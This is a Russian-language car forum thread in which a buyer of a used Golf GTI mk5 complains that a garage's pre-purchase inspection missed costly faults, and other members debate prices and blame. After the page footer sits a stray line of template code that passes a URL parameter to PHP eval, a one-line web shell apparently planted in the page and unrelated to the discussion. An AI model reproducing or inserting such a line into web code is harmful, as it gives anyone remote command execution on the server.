+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 10 из 15

Тема: Как я стал обладателем хлама и спасибо за это сервису.


  1. #1
    Мимо проходил PashuTi is on a distinguished road Аватар для PashuTi
    Регистрация
    15.08.2018
    Откуда
    МСК
    Машина
    mk5 stock
    Сообщений
    5

    Thumbs down Как я стал обладателем хлама и спасибо за это сервису.

    Много букв )))
    Вообщем так, разные машины были, последние японцы и я решил попробовать что то новенькое для себя (попробовал).
    Под мои критерии подходил Golf GTI и Skoda RS, шкода в бюджет не влазила, стал я присматриваться к гольфам, выбор пал на 3х дверный гольф, нашел в Москве(сам я из Москвы), по самой низкой цене на автору. Поехали с другом просто посмотреть, что да как.
    При встрече оказалось что владелец бывший одногрупник моего другана, разговорились, всё поведал, покатал, машина едет бодро, переключает четко, ни призвуков, ни посторонних шумов, всё чётенько, единственное уставший кузов и подтеки масла под мотором. Мотор с коробкой перебирались 20 тыщ назад(со слов продавца), история - бабки были, вкладывал, гонял жутко, заливал только 100й бенз, ломалась, отдавал в сервис, делали, забирал и опять гонял (позже пошерудив инет, понял что данный экземпляр многих надирал в свое время на киевке и ЧТК) позже бабки кончились, машина стоит на продаже.
    Ну так вот, после просмотра, мы уехали, я подумал что 350 за данный авто цена норм, позвонил владельцу и предложил встреться в сервисе.
    На след день, договорился с замечательным сервисом VRT на диагностику перед покупкой, милая девушка Анастасия сказали приезжайте, всё будет тип-топ.
    Приехали, машину мастер посмотрел компом, сказал что мелкие ошибки не чего страшного нет. Поднял на подъемник, говорит течёт сальник коленвала задний, тормаза ок, подвеска ок, мотор и коробас тоже гуд, при этом светил фонариком от телефона попутно общаясь с кем то в чате, я уж хотел сказать типо ты работу сделай, потом переписывайся, но не стал(а зря), всё таки мастер, сервис известный. Говорю давай компрессию проверим, он говорит, нафига, я знаю ребят и сервис где эта машина строилась, всё огонь, нормальные ребята ( как позже выяснилось, пообщавшись с владельцами и почитав отзывы в инете о сервисе где строилась машина, её надо сжечь, а не ездить). Окей, говорю кондей не дует, он мне - меняй радик, ну ок.
    Вообщем мастер говорит, машина норм, бери, вложишь тыщ 30 и катайся, а потом уж кузовом займешься. Говорю ок, ты давай подсчитай по запчастям и работа, завтра мне набери, приеду делать.
    Думаю во зашибись, во фартануло, такой тачан за такие деньги урвал.
    Говорю мастеру, ты давай подсчитай по запчастям и работа, завтра мне набери, приеду делать.
    Прям там подписываем с владельцем ДКП и еду домой довольный.

    Это был вторник, в среду ни звонка, в четверг звоню сам, Анастасия извинилась, сказала у мастера много работы ( в чате наверно переписывается), СЕГОДНЯ ВАМ НАБЕРЕТ.
    А мне в субботу рано утром родственников отвозить за 150 от москвы и потом с палатками с друзьями на все выхи, а масло то капает, надо делать, нахожу в инете 3 сервиса, в течении часа!!!! они мне дают инфу по стоимости работ и запчастей, выбираю тех которые за пятницу смогут все сделать и договариваюсь с ними.
    В пятницу приехал утром в сервис, мастер сразу занялся машиной, я же сказал сальник коленвала, радиатор кондея (запчасти уже все привезены), снял подрамник, завет меня и говорит, у тебя течёт сальник привода(1000р), а не коленвала(4500 сальник и работа 7500), думаю ну ахренеть, куда диагност то смотрел, ну ладно, раз всё сняли и запчасти есть, давай поменяем, заодно маховик глянем, скидываем коробас - маховику пздц, ну втсрял, ищем маховик, нашли за 34, привезли, ставим. Пока везли маховик, скидываем морду, меняем радик кондея, мастер говорит а нахера меняешь, он же целый, может просто надо было заправить??? ну зашибись, диагност то сказал менять, а это радик 6000 + 2000 замена, ну раз разобрали, меняем.
    Говорю, а давай ко ты проведи диагностику, и понеслась, там болтов нет, там сорваны, там течет, там сопливит, это менять, то менять, вентилятор нет лопасти, короче попадалово.
    Вообщем поменяли маховик, сальник коленвала, сальник привода, радик кондея, заправили кондей, итог 55 тыщ.
    Выходные провел отлично, тачка работает прекрасно, но мне не нравятся переключения коробки, жесткие слишком ( ездил к ребятам которые занимаются ремонтом ДСГ, провели диагностику, сказали всё гуд, но один фиг мне не спокойно).
    Съездил ещё в два сервиса на диагностику, в обеих вердикт рамонта(привести машину в порядок) тыщ на 150-200
    Спрашивается, куда этот мастер из VRT смотрел, нахера говорить что тачка норм если там ремонта на 200 штук !!!!
    Я им сам позвонил на днях, высказался, ну а хрен ли, предъявить то нечего (чеки не взял).
    Вот так, машина стоит, ездить страшно,купил блин Golf GTI mk5

  2. #2
    GTI-Racing DepecheR is on a distinguished road Аватар для DepecheR
    Регистрация
    21.01.2012
    Откуда
    Railway-City
    Машина
    Rennrad
    Сообщений
    856
    Ну вообще надо сразу как-бы понимать, мозгом думать, что 5-й уже древнее-придревнее "ведёрко" и Живой днём с огнём не сыскать в продаже, а если и есть, знаю пару клиентов, то они не продаются!
    -=Мой конструктор "Юность-35": https://www.drive2.ru/r/volkswagen/288230376152074605/=-

  3. #3
    Мимо проходил Kucher9tor is on a distinguished road Аватар для Kucher9tor
    Регистрация
    19.04.2016
    Откуда
    Зеленоград
    Машина
    GOLF 5 GTI
    Сообщений
    48
    350к +200 на ремонт = 550к это и есть цена gti5 в хорошем близком к отличному состоянии)

  4. #4
    GTI-Racing DepecheR is on a distinguished road Аватар для DepecheR
    Регистрация
    21.01.2012
    Откуда
    Railway-City
    Машина
    Rennrad
    Сообщений
    856
    Цитата Сообщение от Kucher9tor Посмотреть сообщение
    350к +200 на ремонт = 550к это и есть цена gti5 в хорошем близком к отличному состоянии)
    Весьма сильное заблуждение! Либо у вас очень своеобразное представление о состоянии "Близком к Отличному", т.к. даже если самому выполнить все работы по полной реставрации автомобиля, то уйдёт гораздо, гораздо, гораздо больше денег. Один перекрас, само-собой полный, выльется как минимум под 100 тысяч и это если ещё повезёт произвести его без замены каких-либо деталей кузова, что так-же крайне сомнительно...
    -=Мой конструктор "Юность-35": https://www.drive2.ru/r/volkswagen/288230376152074605/=-

  5. #5
    Мимо проходил Kucher9tor is on a distinguished road Аватар для Kucher9tor
    Регистрация
    19.04.2016
    Откуда
    Зеленоград
    Машина
    GOLF 5 GTI
    Сообщений
    48
    Цитата Сообщение от DepecheR Посмотреть сообщение
    Весьма сильное заблуждение! Либо у вас очень своеобразное представление о состоянии "Близком к Отличному", т.к. даже если самому выполнить все работы по полной реставрации автомобиля, то уйдёт гораздо, гораздо, гораздо больше денег. Один перекрас, само-собой полный, выльется как минимум под 100 тысяч и это если ещё повезёт произвести его без замены каких-либо деталей кузова, что так-же крайне сомнительно...
    Может и своеобразное, считаю из 12-летней машины нет смысла пытаться сделать новую, слово реставрация тут вообще не уместно. Менять расходники по регламенту, а точнее раза в два чаще, и ремонтировать машину не тогда когда перестаёт ехать, а заранее, чаще всего есть какие-то предпосылки, вот и всё.

  6. #6
    GTI-Racing DepecheR is on a distinguished road Аватар для DepecheR
    Регистрация
    21.01.2012
    Откуда
    Railway-City
    Машина
    Rennrad
    Сообщений
    856
    Цитата Сообщение от Kucher9tor Посмотреть сообщение
    слово реставрация тут вообще не уместно.
    Неуместно тут лишь мнение дилетанта...
    -=Мой конструктор "Юность-35": https://www.drive2.ru/r/volkswagen/288230376152074605/=-

  7. #7
    Мимо проходил PashuTi is on a distinguished road Аватар для PashuTi
    Регистрация
    15.08.2018
    Откуда
    МСК
    Машина
    mk5 stock
    Сообщений
    5
    Когда покупаешь машину новую для себя, того производителя с которым ранее не сталкивался, то едешь в сервис, доверяешь мастеру и ещё платишь ему деньги за это, он должен выполнять свою работу качественно, ведь от его совета зависит серьезное решение. Я доверился сервису и мастеру, а он отнесся на от@бись. Итог, я обладатель машины, в которую куча вложений.
    Понятно что за дешего хорошее не купишь и к вложениям я был готов, но когда тебе говорят что течет мотор, а по факту оказывается коробка, что тормоза еще походят год, а я снимаю колодки - они стерты в ноль до металла и ещё куча нюансов, спрашивается куда этот хрен(мастер) смотрел ?

  8. #8
    GTI-Racing hakke.net is on a distinguished road Аватар для hakke.net
    Регистрация
    02.08.2013
    Откуда
    Москва
    Машина
    Scirocco
    Сообщений
    70
    ну че сэкономил норм на машине)) нахрена было хламину брать, повелся на цену, а виноват сервис. может тебе было озвучено вложений, чтоб она хоть как-то могла ездить.

  9. #9
    Мимо проходил PashuTi is on a distinguished road Аватар для PashuTi
    Регистрация
    15.08.2018
    Откуда
    МСК
    Машина
    mk5 stock
    Сообщений
    5
    Хламина - это громко сказано. Машина прекрасно ездит, валит, управляется, всё работает что должно работать. Тему так назвал для пущего обострения, да и обсуждается не машина, а конкретно сервис и мастера. К сожалению халатность мастеров зашкаливает, может мне так не везет, но уже сменил 3 сервиса, по причине - мне не нравится как работают мастера.

  10. #10
    GTI-Racing hakke.net is on a distinguished road Аватар для hakke.net
    Регистрация
    02.08.2013
    Откуда
    Москва
    Машина
    Scirocco
    Сообщений
    70
    если не нравятся мастера, то только самому брать ключи и делать для себя.

+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя

Похожие темы

  1. Ответов: 12
    Последнее сообщение: 09.04.2024, 17:59
  2. стать обладателем Гольф GTI V
    от Renat в разделе Golf 5
    Ответов: 36
    Последнее сообщение: 02.01.2024, 14:35
  3. Спасибо, человеку на кутузовском!
    от Donky в разделе Курилка
    Ответов: 0
    Последнее сообщение: 10.03.2016, 20:37
  4. КУПИТЬ КОРОТКОХОДНУЮ КУЛИСУ НА VR6(AAA)! Спасибо!
    от Sergei_VR6 в разделе Тюнинг: подвеска, ходовая, тормозная система, КПП
    Ответов: 0
    Последнее сообщение: 02.03.2010, 06:46
  5. Спасибо!!!!!!!!!!
    от magnum126 в разделе Курилка
    Ответов: 17
    Последнее сообщение: 23.11.2006, 01:44

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}